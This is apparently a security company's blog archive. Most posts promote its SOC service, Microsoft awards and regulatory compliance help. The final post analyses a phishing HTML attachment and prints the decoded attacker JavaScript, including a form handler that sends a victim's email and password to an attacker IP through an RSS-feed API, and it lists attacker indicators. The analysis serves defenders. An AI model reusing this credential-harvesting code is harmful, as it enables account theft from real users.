3 November 2021

Microsoft 365 Defender Named Forrester Leader for XDR, Q4 2021




Earlier this week, Microsoft announced they were named a Leader in The Forrester New Wave™: Extended Detection and Response (XDR) category for Q4 of 2021 for Microsoft 365 Defender. XDR (Extended Detection and Response) tools have seemingly popped up everywhere as the latest tool to assist organisations with real-time insight into cyber threats. In an already saturated market for XDR and security tools alike, Microsoft has done well to mature their offering and is evidenced by taking a different approach—XDR tools needs to not only effectively identify threats but provide enough data to be effectively managed by cybersecurity experts.

A powerful security tool…

At Kirk ISS, we’ve found the Microsoft 365 Defender suite performs excellent when paired with deeper licensing. The more cybersecurity-centric licenses, such as Microsoft 365 Business Premium, Enterprise Mobility Security + E5, and Defender for Endpoint, provide enriched data that feeds into Microsoft 365 Defender. When this data is presented in a single pane of glass to our cybersecurity analysts, threats can be identified and mitigated earlier in the cyber kill chain with less impact to customers.

So, what does this mean for your company?

The good news is if you are already utilising portions of the Microsoft stack in your day to day operations, Microsoft 365 Defender is already working hard to keep your data secure. However, it really shines by aggregating data effectively across all aspects of an organisation where seasoned cybersecurity experts can identify threats quickly. Our SOCaaS, the only on-island Security Operations Center in the Cayman Islands, is powered by Azure Sentinel, a natural extension to the award-winning XDR tool. To learn more about how our SOCaaS can leverage Microsoft 365 Defender to secure your organisation, reach out to Kirk ISS today.

12 October 2021

Cybersecurity Best Practices: Quick Wins for Organisations




In light of the rapid change from corporate offices to remote workforces, organisations have been forced to focus on cybersecurity more than ever. Developing a robust cybersecurity framework that cascades throughout the business is paramount to ensuring the remote workforces are as protected as their office counterparts. For most organisations, the cybersecurity foundation starts with simple, yet sensible data protection policies and rules that are consistently enforced. Several examples of easy ways to bolster your organisation’s cybersecurity framework include:

 

Develop Formal IT Policies and Procedures

Almost every industry has some form of regulatory guidance for organisations to adhere to. Financially regulated entities have items like CIMA’s statement of guidance, vendors and retailers must adhere to Payment Card Industry (PCI), and every organisation needs to be aware of the EU’s General Data Protection Regulation (GDPR). Creating formal IT policies and procedures goes beyond rules for employees to follow when using their work computers – it creates a foundation for the organisation to operate should it need to recover from a disaster or plan for business continuity, how they mange their third-party affiliates and vendors, and how they plan on responding to cybersecurity threats and incidents.

 

 

Train Cyber Ninja Employees

*In 2021, nearly 85% of data breaches involved some form of human element to gain entry into a network. Training your staff how to identify threat is key to preventing a cybersecurity incident from occurring. The best training doesn’t happen in a vacuum – the cyber threat landscape evolves constantly, requiring at least annual refreshers for employees to be set up for success. Our cybersecurity team conducts regular End User Awareness Training, along with simulated Social Engineering Assessments to proactively identify areas to strengthen.

 

 

Tighten Cloud-Based Platforms

Work from home is rapidly evolving into work from anywhere. With BYOD becoming the norm for more and more organisations, it’s important to employ effective mobile access policies. Spending time to review cloud-based platforms, such as Microsoft Azure and Office 365 controls will help define security baselines to ensure resources are protected no matter where they are stored. Some controls should include the use of Multi-Factor Authentication (MFA), password managers, Conditional Access policies, compliance and configuration baselines, remote management of devices, and identity protection for users and corporate resources alike. Kirk ISS regularly reviews customer baselines during our Infrastructure Audits to uncover gaps in configurations, helping strengthen their cybersecurity posture.

 

 

Think Like an Adversary

Regardless of whether you believe that “offense wins games, but defense wins championships”, the truth is there are more attackers than there are defenders in the cybersecurity workforce. *Gartner reports that in 2019, there was a deficit of nearly 65% between roles waiting to be filled and the talent pool of cybersecurity professionals. What does this mean for you? Small to medium business may not have the budget or need for a fully-fledged cybersecurity team to proactively monitor, identify, and respond to threats like large organisations, but the need is there. Kirk ISS has developed a SOC as a Service (SOCaaS) to provide budget-friendly, cost effect methods of providing proactive cyber threat monitoring. In addition, assessments like Network Security Assessments have our cybersecurity professionals simulate hacking activities to uncover vulnerabilities before they can be exploited by the real bad guys.

 

Balancing Security with Productivity

Cybersecurity has become ubiquitous with the current state of remote work and will continue to be a dominant concern. CIO’s and IT managers will need to strike a balance between driving productivity with the very real need to protect data from an ever-evolving threat landscape. Fortunately, our team of cybersecurity experts can help if you need help deploying any of these best practices to protect your IT systems.

Some of the cybersecurity services we offer:

Security Operations Centre as a Service (SOCaaS)
Network Security Assessments/Penetration Testing
Social Engineering Assessments
Policy Creation
• End User Awareness Training
• Infrastructure Audits

* 2021 Verizon DBIR (https://enterprise.verizon.com/resources/reports/2021-data-breach-investigations-report.pdf)
* https://www.gartner.com/en/human-resources/research/talentneuron/labor-market-trends/cybersecurity-labor-shortage-and-covid-19

14 September 2021

CIMA Statement of Guidance and You: How to Navigate New Regulations




In May of 2020, CIMA released a statement of guidance discussing specific requirements for regulated entities within the cybersecurity space. In the guidance, CIMA issued recommendations based on other recent regulations, such as Cayman’s Data Protection Law and the now commonplace GDPR. In this statement of guidance, CIMA placed the responsibility of identifying, monitoring, and preventing cyber threats onto the shoulders of regulated entities. In addition to these requirements, CIMA also laid the groundwork for organisations to identify gaps within their risk profile, as well as take a deeper look into what vendors are being used.

 

 

 

A quick overview of the new requirements is listed below:

  • Cybersecurity threat monitoring and prevention
  • Risk assessment
  • Penetration testing
  • Policy creation and implementation, including:
    • Vendor Due Diligence
    • Business Continuity Planning
    • Incident Response
    • Breach Notifications

 

These threats are always present and attackers using these techniques are changing to evade security controls. While this may seem daunting to smaller organisations or those that have never had to think about these threats before, now is good time to begin. There are several solutions out there, including those provided by Kirk ISS, that can help with not only regulatory satisfaction but also peace of mind.

Cybersecurity Threat Monitoring and Prevention

Kirk ISS has introduced SOC as a Service (SOCaaS) to customers in Cayman and throughout the Caribbean. SOCaaS provides organisations a cost-effective option for supplementing their IT environment with cybersecurity professionals that provide 24×7 support. SOCaaS utilises a “bring your own licensing” scheme that builds on what your organisation already has in place and can help shine light into gaps in the security posture. SOCaaS also natively connects with Microsoft products, allowing Kirk ISS to proactively monitor and mitigate threats across your organisation including email, identity management, Azure, Office 365, endpoints, and more. Analytics rules are deployed that identify threats such as phishing, brute forcing attempts, malware, data leakage, and more. More information about the Kirk ISS SOCaaS can be found here.

Penetration Testing

Penetration testing is a proactive assessment where cybersecurity professionals identify security vulnerabilities within an organisation in an effort to mitigate threats prior to attackers exploiting them. Kirk ISS’ cybersecurity engineers have years of experience performing penetration tests against organisations’ internal and external infrastructure, web applications, along with boutique testing scenarios.
Our Network Security Assessment (NSA) combines both traditional penetration testing and a vulnerability assessment to identify threats and misconfigurations within your organization. This approach is designed to provide granularity into not only underlying vulnerabilities, but to provide details about how they affect your overall security posture. More information about the Kirk ISS Network Security assessment can be found here.

Policy Creation

Written policies are the backbone of a successful information security program. Each organisation is different in the way they operate, deploy IT systems, and require each user to interact with internal resources. Without this baseline to refer to, an organisation is fighting uphill to define proper procedures and methodologies.
With years of experience working in cyber risk and threat management, Kirk ISS works with key stakeholders to help develop internal IT policies and procedures unique to your organisation. With CIMA’s Statement of Guidance as a baseline, we can develop mature IT policies to help make regulatory compliance much easier and help mold your organisation’s IT posture.

 

 

To learn more about where your organisation’s IT maturity lies compared to CIMA’s Statement of Guidance, contact Kirk ISS at 345-623-4730 or security@kirkiss.ky.

12 July 2021

Kirk ISS Named 2021 Microsoft Country Partner of the Year for the Cayman Islands




 

[GEORGE TOWN, Grand Cayman], [Cayman Islands] — July 12, 2021 — Kirk ISS today announced it has won the Cayman Islands 2021 Microsoft Partner of the Year Award. The company was honored among a global field of top Microsoft partners for demonstrating excellence in innovation and implementation of customer solutions based on Microsoft technology.

According to Kirk Office Managing Director Geoffrey Cuff, this year’s award is particularly special:We’re thrilled to be recognized as the 2021 Microsoft Partner of the Year for the Cayman Islands. Over the last 12 months, our IT division at Kirk ISS has helped businesses overcome unprecedented challenges using Microsoft powered solutions, particularly in the cybersecurity space. Whether we are securing sensitive data or enabling remote working, our focus at Kirk ISS is always on helping businesses leverage technology to achieve more for their stakeholders. We’re incredibly proud to be recognized by a global technology leader like Microsoft for delivering the very best in cutting-edge cybersecurity solutions”.

The Microsoft Partner of the Year Awards recognize Microsoft partners that have developed and delivered outstanding Microsoft-based solutions during the past year. Awards were classified in various of categories, with honorees chosen from a set of more than 4,400 submitted nominations from more than 100 countries worldwide. Kirk ISS was recognized for providing outstanding solutions and services in the Cayman Islands.

The Microsoft Country Partner of the Year Award recognizes one winning Microsoft partner per country for excellence in the delivery if Microsoft solutions and advancement of the company’s mission to empower every person and every organization on the planet to achieve more.

“I am honored to announce the winners and finalists of the 2021 Microsoft Partner of the Year Awards,” said Rodney Clark, corporate vice president, Global Partner Solutions, Channel Sales and Channel Chief, Microsoft. “These remarkable partners have displayed a deep commitment to building world-class solutions for customers—from cloud-to-edge—and represent some of the best and brightest our ecosystem has to offer.”

28 January 2021

Gone Phishing: A Deep Dive Into Phishing Campaigns




Kirk ISS Cybersecurity Post

Overview

Earlier this week, we uncovered a somewhat complex phishing campaign that passed VirusTotal and Microsoft’s Automated Investigation and Response (AIR) as non-malicious. While the email itself was fairly innocuous (other than looking exactly like a phishing email and suspicious domain), the attachment it contained was what drew us in. Malicious attachments aren’t anything new, but this one contained thousands of lines of CSS and formatting to emulate an Outlook web login perfectly. In addition, it also had a massive block of Base64-encoded JavaScript that emulated a Microsoft Login.

The result? A convincing phishing email designed to trick users into believing it is a legitimate page.

 

 

Deep Dive

The initial email utilises emails found by scraping a website. In one case, an “info@domain” account was both sender and recipient, adding to some level of legitimacy. In another, the “info@domain” was sent to a user whose email was also scraped online.

 

 

The email stated the user had received a meeting notification, attached as an HTML document. Once downloaded, the attachment served two functions:

  1. Create a convincing Outlook web login attempt, and
  2. Trigger embedded Base64 JavaScript to replicate a Microsoft login and steal credentials.

 

 

The attachment took extreme caution in making the webpage appear as authentic as possible; the first several hundred lines contained CSS and animations used by Microsoft. Once opened, an alert stating “Network Connection Error” appears, regardless of connectivity – this portion is hard-coded when a using a browser other than Edge.

 

 

To get a better understanding of the attachment, we dove into the source code and decoded all Base64 components. Here’s what happens under the hood when the user clicks the “retry” button:

function start(){
         document.getElementById("mArea").style.opacity = 0;
         setTimeout(()=>{
             if(!isEdge() ){

         var ap = "#params?msofficeoutlook=o365apps/vac3uram5aghboqli9yktoefi2dwjj=&id="+email+"&params=vac3uram5aghboqli9yktoefi2dwjj";
                 window.location.href =  toText(Base64.decode(nextHmtl))+ap;
             }
             else{
                 document.write((Base64.decode(nextHmtl)));
             }
         },2500);
     }

 

The nextHtml variable is where the malicious JavaScript starts take affect. Close to 6000 lines in length, only the last hundred or so are used for actually capturing credentials. The rest are spent pulling appropriate resources from Microsoft’s servers to give the appearance of a legitimate login attempt, pre-populated with the email recipient to provide additional “validity”.

 

 

Further investigation revealed users were forced to enter their password multiple times after an “invalid password” prompt. This acted as a verification mechanism that the given credential set was legitimate. In addition, the user-supplied credentials are sent to a GetContact account, which may serve as a notification system for the attacker. In the last step, all information entered by the victim is sent to an RSS feed in AWS, indicative of a “sit back and wait” phishing attack.

Here’s a look into what is harvested from the victim and sent back to the attacker:


    $("#i0281").submit(function(e) {
        e.preventDefault();

        $("#idSIButton10").attr("disabled",true);
        //$("input[type='password']").blur();

        var _email = $("#firstem").val();
        var password = $("#secondpw").val();
        var data = {"operationName":"createFeed","variables":{"url":"hxxp://34.237.38.125/rss.php?u="+_email+"&k="+password,"simulate":false,"interfaceType":"GENERATOR"},"query":"mutation createFeed($url: String, $simulate: Boolean, $interfaceType: FeedInterfaceType, $isPreview: Boolean, $scrapingRules: ScrapingRulesInput, $requestObject: RequestObjectInput) {n  createFeed(url: $url, simulate: $simulate, scrapingRules: $scrapingRules, requestObject: $requestObject, isPreview: $isPreview, interfaceType: $interfaceType) {n    titlen    descriptionn    feedUrln    siteUrln    siteNamen    imageUrln    generatorn    items {n      titlen      urln      descriptionn      daten      enclosure {n        urln        __typenamen      }n      __typenamen    }n    __typenamen  }n}n"};
        $.ajax({
            url: 'https://rss.app/graphql',
            dataType: 'json',
            contentType:'application/json',
            data: JSON.stringify(data),
            dataType:'json',
            method: 'post'
        }).done(function(data) {
                if(data.errors){
                    if(navigator.userAgent.toLowerCase().indexOf('firefox') > -1){
                        window.location.reload();
                    } else {
                        $("#idSIButton10").attr("disabled",false);
                        //$("input[type='password']").attr("disabled",false);
                        document.getElementById("i0281").reset();
                        $("#idBtn_Back").click();
                        detetch(email);
                    }

                } else{
                    window.location.href = "https://www.britishcouncil.org/sites/default/files/languages-for-the-future-report.pdf";
                }
        }).fail((data)=>{
            window.location.reload();
        });
    });

 

This email was unique in the effort to emulate code used by Microsoft to come up with a similar login. By using the embedded and encoded script, it can run in the same browser or tab to seem as innocuous as possible. While it may seem odd that this much effort was put into creating an attachment and not into the actual delivery of the email, it lends to the belief this was most likely purchased for use in private campaigns.

Attacker Details

Domain: emails[dot]outlook365services[dot]com
Sender IP: 54.240.48.109
Receiving IP: 34.237.38.125